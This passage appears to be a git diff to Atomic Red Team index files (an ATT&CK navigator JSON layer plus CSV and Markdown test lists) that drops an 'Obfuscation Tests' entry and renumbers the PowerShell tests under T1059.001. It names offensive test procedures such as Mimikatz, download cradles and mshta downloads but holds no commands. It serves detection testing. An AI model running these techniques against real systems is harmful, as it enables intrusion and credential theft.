Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":117,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index ba3f85fd34..1a0a2da848 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -917,24 +917,23 @@ execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-be execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt execution,T1059.001,Command and Scripting Interpreter: PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell execution,T1059.001,Command and Scripting Interpreter: PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Obfuscation Tests,4297c41a-8168-4138-972d-01f3ee92c804,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual -execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual +execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 71e5e0c86a..68094d9cb0 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -618,24 +618,23 @@ execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-be execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt execution,T1059.001,Command and Scripting Interpreter: PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell execution,T1059.001,Command and Scripting Interpreter: PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Obfuscation Tests,4297c41a-8168-4138-972d-01f3ee92c804,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual -execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual +execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 70d49e159b..86862318cf 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1239,24 +1239,23 @@ - Atomic Test #1: Mimikatz [windows] - Atomic Test #2: Run BloodHound from local disk [windows] - Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows] - - Atomic Test #4: Obfuscation Tests [windows] - - Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows] - - Atomic Test #6: Invoke-AppPathBypass [windows] - - Atomic Test #7: Powershell MsXml COM object - with prompt [windows] - - Atomic Test #8: Powershell XML requests [windows] - - Atomic Test #9: Powershell invoke mshta.exe download [windows] - - Atomic Test #10: Powershell Invoke-DownloadCradle [windows] - - Atomic Test #11: PowerShell Fileless Script Execution [windows] - - Atomic Test #12: NTFS Alternate Data Stream Access [windows] - - Atomic Test #13: PowerShell Session Creation and Use [windows] - - Atomic Test #14: ATHPowerShellCommandLineParameter -Command parameter variations [windows] - - Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] - - Atomic Test #16: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] - - Atomic Test #18: PowerShell Command Execution [windows] - - Atomic Test #19: PowerShell Invoke Known Malicious Cmdlets [windows] - - Atomic Test #20: PowerUp Invoke-AllChecks [windows] - - Atomic Test #21: Abuse Nslookup with DNS Records [windows] + - Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows] + - Atomic Test #5: Invoke-AppPathBypass [windows] + - Atomic Test #6: Powershell MsXml COM object - with prompt [windows] + - Atomic Test #7: Powershell XML requests [windows] + - Atomic Test #8: Powershell invoke mshta.exe download [windows] + - Atomic Test #9: Powershell Invoke-DownloadCradle [windows] + - Atomic Test #10: PowerShell Fileless Script Execution [windows] + - Atomic Test #11: NTFS Alternate Data Stream Access [windows] + - Atomic Test #12: PowerShell Session Creation and Use [windows] + - Atomic Test #13: ATHPowerShellCommandLineParameter -Command parameter variations [windows] + - Atomic Test #14: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] + - Atomic Test #15: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] + - Atomic Test #16: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] + - Atomic Test #17: PowerShell Command Execution [windows] + - Atomic Test #18: PowerShell Invoke Known Malicious Cmdlets [windows] + - Atomic Test #19: PowerUp Invoke-AllChecks [windows] + - Atomic Test #20: Abuse Nslookup with DNS Records [windows] - [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) - Atomic Test #1: Create Systemd Service and Timer [linux] - Atomic Test #2: Create a user level transient systemd service and timer [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 7567634661..c95b224d4a 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -857,24 +857,23 @@ - Atomic Test #1: Mimikatz [windows] - Atomic Test #2: Run BloodHound from local disk [windows] - Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows] - - Atomic Test #4: Obfuscation Tests [windows] - - Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows] - - Atomic Test #6: Invoke-AppPathBypass [windows] - - Atomic Test #7: Powershell MsXml COM object - with prompt [windows] - - Atomic Test #8: Powershell XML requests [windows] - - Atomic Test #9: Powershell invoke mshta.exe download [windows] - - Atomic Test #10: Powershell Invoke-DownloadCradle [windows] - - Atomic Test #11: PowerShell Fileless Script Execution [windows] - - Atomic Test #12: NTFS Alternate Data Stream Access [windows] - - Atomic Test #13: PowerShell Session Creation and Use [windows] - - Atomic Test #14: ATHPowerShellCommandLineParameter -Command parameter variations [windows] - - Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] - - Atomic Test #16: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] - - Atomic Test #18: PowerShell Command Execution [windows] - - Atomic Test #19: PowerShell Invoke Known Malicious Cmdlets [windows] - - Atomic Test #20: PowerUp Invoke-AllChecks [windows] - - Atomic Test #21: Abuse Nslookup with DNS 